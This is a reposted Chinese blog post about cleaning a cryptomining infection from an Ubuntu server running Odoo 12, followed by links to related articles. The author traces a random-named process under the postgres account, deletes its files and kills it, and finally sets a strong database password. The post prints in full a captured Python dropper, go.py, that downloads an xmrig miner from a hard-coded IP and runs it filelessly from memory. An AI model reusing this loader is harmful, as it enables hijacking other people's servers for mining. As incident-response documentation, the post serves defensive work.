服务器异常 随机名称的进程CPU资源占用过高

最新推荐文章于 2023-05-19 14:02:04 发布
最新推荐文章于 2023-05-19 14:02:04 发布
阅读量215 收藏
点赞数
文章标签: 操作系统 运维 数据库
原文链接:http://www.cnblogs.com/lnkDel/p/11553741.html
版权

操作系统: Ubuntu 16.04

之前部署完odoo12后就经常出现服务挂掉的情况,查看状态一般都是某某包缺失,然后各种安装包,重启服务,这次发现CPU占用达到399%,而且每次进程名称都是随机的,通过postgres用户执行,遂怀疑之前安装包的时候装了什么不好的东西,通过以下步骤排查:

1. 通过top命令查看进程

  发现PID为2981的进程异常

 

2. 通过在进程目录下找执行的程序:

cd /cd/proc/2981
sudo ls -l exe

 定位到执行文件所在目录/var/lib/postgressql

 

3. 定位到执行文件后,切换到执行文件所在目录删除可疑文件

cd /var/lib/postgresql
ls -la

  一下就看到有若干可疑脚本文件和文件夹,将.ssh、.systemd-init、.bash_history都删除了。

 

4. kill异常进程

kill -9 2981

然后再使用top命令查看进程

 世界暂时安静了。

 

后续:观察了一小会,发现问题依旧,又出了一个新进程占CPU399%了,于是继续排查。

1. 通过对异常进程定位,发现还是在之前的目录,但进入到目录,发现之前被删除的文件没有再出现,于是进入到子目录内查找,在以下目录发现新问题

 

 首先,映入眼帘的是go.py文件,这太明显了,于是打开该文件,内容如下:

import os
import sys
import ctypes
import hashlib
import urllib2
import platform


def run_miner(binary):
    fd = ctypes.CDLL(None).syscall(319, "", 1)
    final_fd = open('/proc/self/fd/' + str(fd), 'wb')
    final_fd.write(binary)
    final_fd.close()

    fork1 = os.fork()
    print os.getpid()
    if 0 != fork1:
        os._exit(0)

    ctypes.CDLL(None).syscall(112)

    fork2 = os.fork()
    if 0 != fork2:
        os._exit(0)

    os.execl('/proc/self/fd/' + str(fd), '', '')


def load_miner(url):
    try:
        response = urllib2.urlopen(url)
        binary = response.read()
    except:
        return None
    return binary


def get_sysinfo():
    _arch = ctypes.sizeof(ctypes.c_void_p) * 8
    if _arch is 64:
        _arch = 64
    elif _arch is 32:
        _arch = 32
    else:
        return False

    kernel_name = platform.system()
    if "linux" in kernel_name:
        _os_name = "linux"
    elif "win" in kernel_name:
        _os_name = "win"
    else:
        return False

    return _os_name, _arch


def get_md5(binary):
    return hashlib.md5(binary).hexdigest()


if __name__ == "__main__":
    os_name, arch = get_sysinfo()

    if os_name != "linux":
        sys.exit(0)
    miner_url = "http://185.193.125.38:8000/cyka/xmrig-" + arch
    miner_md5 = ["fd4e61e02958b57b8446325b62efa1ea", "616b7f7f9a061fd8a90c83467e7139e0"]

    miner_max_retry = 10

    _dl_count = 1
    while True:
        miner_bin = load_miner(miner_url)
        if get_md5(miner_bin) in miner_md5 or miner_max_retry < _dl_count:
            break
        _dl_count = _dl_count + 1

    try:
        run_miner(miner_bin)
    except:
        pass

很明了了,应该就是它,删除该文件,然后kill掉异常进程,继续观察,一会后,问题依旧!!!!!


继续排查,还是在原来的目录下发现一个可执行文件,如下

这是可疑文件,删除之,欸,没任何反应。。。

 

 rm -rf 删了没反应!!!

文件还是在!!!

怎么办???

没权限??

chmod赋个777

 

 见鬼!

看着那个绿色的postgresq1眉头紧蹙,捶胸顿足,木有办法呢

十分钟过去了

二十分钟过去了

灵光一现,那后面不是l是1啊,这名字太好了,于是直接:

rm -rf postgresq1

 

删掉了!!!!!!!

赶紧kill异常进程,再观察,这次应该没问题了

 

再次后续。问题又来了!!!!!

若干时间后问题再现了,该删的都删了,还是能自动执行,查看了crontab任务、自启动项,都没有收获,几乎想放弃了,想到对方使用postgres账户执行,遂设置postgres账户密码,使用较强密码,然后再kill异常进程,过去40分钟了,这次没有再看到新的进程,谢天谢地!

转载于:https://www.cnblogs.com/lnkDel/p/11553741.html

weixin_30892889
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Http状态
Janderbake的博客
04-26 474
存有 XMLHttpRequest 的状态。readyState从 0 到 4 发生变化。 0: 请求未初始化 1: 服务器连接已建立 2: 请求已接收 3: 请求处理中 4: 请求已完成,且响应已就绪  State200:服务器响应正常。  304:该资源在上次请求之后没有任何修改(这通常用于浏览器的缓存机制,使用GET请求时尤其需要注意)。  400:无法找到请求的资源
随机10字符进程,CPU占满,linux病毒
lingdi2000的专栏
11-05 455
随机10字符进程,CPU占满,linux病毒 因为病毒已经清掉了,就不能再截图了。。。 卡死 今天登入机器发现巨卡,第一反应top,MD top都能卡半天,不够还好还是输出内容来了,发现有一个进程cpu占用特别高,进程名字也很奇怪,就是随便几个字符。 例如: hhdyxhxzf fdshfjkxycu 清除过程 当然是kill掉那个进程,不过过一会又有新的进程起来了。很正常病毒没有一个能简单k...
清除随机进程名称的木马 libudev.so
weixin_34337381的博客
05-24 466
前天遇到求助,说某服务器大量对外发包,怀疑是中病毒了,已经把网络断开,但是相关的服务也就不可用了。 于是进机房,登录到该服务器上,CentOS 系统,root 弱密码,呵呵呵~理想的“肉鸡”。 先执行 top 看看有什么进程,果然看到有好几个进程随机名称,而且还过几秒就变一次。好玩~ 首先查看定时任务 crontab -l,有 2 条定时从某 IP 上...
windows中的服务名有很多随机字符
qq_38963393的博客
05-22 769
这些带有随机字符的服务是windows的per-service,不是病毒。 Per-user services are services that are created when a user signs into Windows or Windows Server and are stopped and deleted when that user signs out. 具体信息参考下面的链接: https://docs.microsoft.com/zh-cn/windows/application-m
CPU占用率高的N种原因
10-01
CPU占用率高的N种原因 ...CPU占用率高的N种原因主要是防杀毒软件、驱动认证、病毒、木马、服务设置、网络连接、svchost进程、鼠标右键等方面的问题。通过解决这些问题,可以减少CPU占用率,提高计算机性能。
win7 cpu占用过高怎么办?.docx
09-27
大量的测试版驱动程序在网上泛滥,可能会造成 CPU 资源占用过高。这些驱动程序可能没有经过认证,可能会导致系统不稳定、CPU 占用过高。为了避免这种情况,用户应该选择认证的驱动程序,并且经常更新驱动程序。 ...
解决svchost.exe CPU占用过高.docx
09-27
解决svchost.exe CPU占用过高的方法 svchost.exe是一个核心系统进程,但是在某些情况下,它可能会占用大量的CPU资源,导致系统变慢。那么,什么原因会导致svchost.exe CPU占用过高呢? 1. 驱动没有经过认证,...
CPU利用率过高分析
06-12
当负荷过重的时候,CPU占用率可能过高,这是因为在工作项的数目和响应能力之间存在固有的权衡关系。你要确定合适的MaxWorkItems设置以提高系统响应能力。如果设置的值不正确,服务器的响应能力可能会受到影响,或者...
Linux杀不死的进程CPU使用率700%解决方法
01-20
发现有个进程CPU使用率居然700%,COMMAND 是一些随机字符串组成,完了~ 中标了;第一想到就是“沙雕”它,kill 命令给我上。 [root@zwlbs3 ~]# kill -9 PID ii. 但是发现 kill 该进程平静一会后又启动了。 注:...
python中的多进程编程
weixin_42289273的博客
09-04 404
1.什么是进程(process)和线程(thread) 进程操作系统分配资源的最小单元, 线程是操作系统调度的最小单元。 一个应用程序至少包括1个进程,而1个进程包括1个或多个线程,线程的尺度更小。 每个进程在执行过程中拥有独立的内存单元,而一个线程的多个线程在执行过程中共享内 2.Python的多进程编程与multiprocess模块 multiprocess模块中的Process方法接收两个参数, 第一个是target,一般指向函数名,第二个时args,需要向函数传..
cpu占用异常,问题定位及解决方案
最新发布
doushuopeng的博客
05-19 382
linux下高cpu占用问题定位
服务器 cpu资源占用高,服务器CPU负载过高,如何定位问题
weixin_39778106的博客
07-29 1263
一、排查 CPU 故障的常用命令top:Linux 命令。可以实时查看各个进程CPU 使用情况。也可以查看最近一段时间的 CPU 使用情况。默认按 CPU 使用率排序。ps:Linux 命令。强大的进程状态监控命令。可以查看进程以及进程中线程的当前 CPU 使用情况。属于当前状态的采样数据。jstack:Java 提供的命令。可以查看某个进程的当前线程栈运行情况。根据这个命令的输出可以定位某个...
cpu占用100%-异常进程分析
weixin_43568232的博客
12-15 478
cpu占用100%分析 1.找到占用cpu较高的pid top 2.查询该pid下所有线程id top -H -p pid 3. 将十进制线程id换成16进制: print "%x/n" 线程id 4.查看进程下的线程正在执行的代码: jstack pid|grep '步骤3命令结果' 根据输出结果即可排查问题代码。 头发越来越少是有原因的,具体原因如下图: ...
实战CPU占用过高问题定位
sun01803326的博客
01-16 1334
      网上学习了CPU 占用过高如何快速定位的方法后,根据现有的项目实战一次。废话不多说了,直接展示定位的问题的详细步骤。 服务部署在Linux服务器,定位问题的方法,主要也是使用相关的Linux命令与JDK查看堆栈,GC日志等相关命令。 1.问题发现 top  查看当前服务器各个进程运行占用CPU,内存等情况。 发现PID为26916进程占用CPU过高 2.问题分析 top...
问题 - 异常占用大量 CPU 资源排查
大漠知秋的加油站
01-27 1988
  一日,收到服务器 CPU 资源占用满的报警,如下,随抓紧排查: top   首先使用最简单的工具 top 一下,查看是哪个进程占用了大量的 CPU 资源,如下: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Y6PVo6hg-1611714688629)(http://pencil.file.lynchj.com/depend/20210127094718.png)]   可以看到的是一个 Java 进程把所有的 CPU 资源都给占用掉了,一个完整的 Java 程序
linux杀掉cpu使用率高的进程,线上linux系统故障排查之一:CPU使用率过高
weixin_29786123的博客
04-28 1323
一个应用占用CPU很高,除了确实是计算密集型应用之外,通常原因都是出现了死循环。下面我们将一步步定位问题,详尽的介绍每一步骤的相关知识。一、通过top命令定位占用cpu高的进程执行top命令得到以下结果:top命令执行结果通过上图可以明显看出进程PID41843占用cpu过高,明显存在问题,定位到了进程id。当然如果你想只观察进程PID41843的CPU和内存以及负载情况,可以使用以下命令top ...
odoo用户占用cpu较高的问题
dorlolo的博客
09-17 261
odoo用户占用cpu较高的问题
Odoo 环境下Ubuntu服务器性能优化–参数调整 (转老邓的)
jason156的专栏
06-21 1285
使用Odoo进行内部信息化管理,随着业务增长,服务器性能问题变成了瓶颈,为了解决这些问题,最近的工作重点将移到性能调整上来,同时也会在此记录整个处理过程,以便日后回顾。 1.根据相关资料建议,在linux文件系统有一个预读的参数,可以通过如下命令查看: blockdev --getra /dev/sda 一般的默认值为256,我们可以将此数据改大一点,建议的范围是在4096-16384之间,预读不足的常见问题是写磁盘的速度要比读取的速度要高。 改变参数的命令格式是:blockdev --setra
提升银行业务:构建高性能服务的关键策略
"构建高性能服务是一项关键的IT技能,它涉及到多个维度和技术层面。首先,理解高性能的定义至关重要,这包括快速分析和索引大量数据的能力,同时处理高并发事务,以及执行高级复杂的科学运算。数据的实时采集和实时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值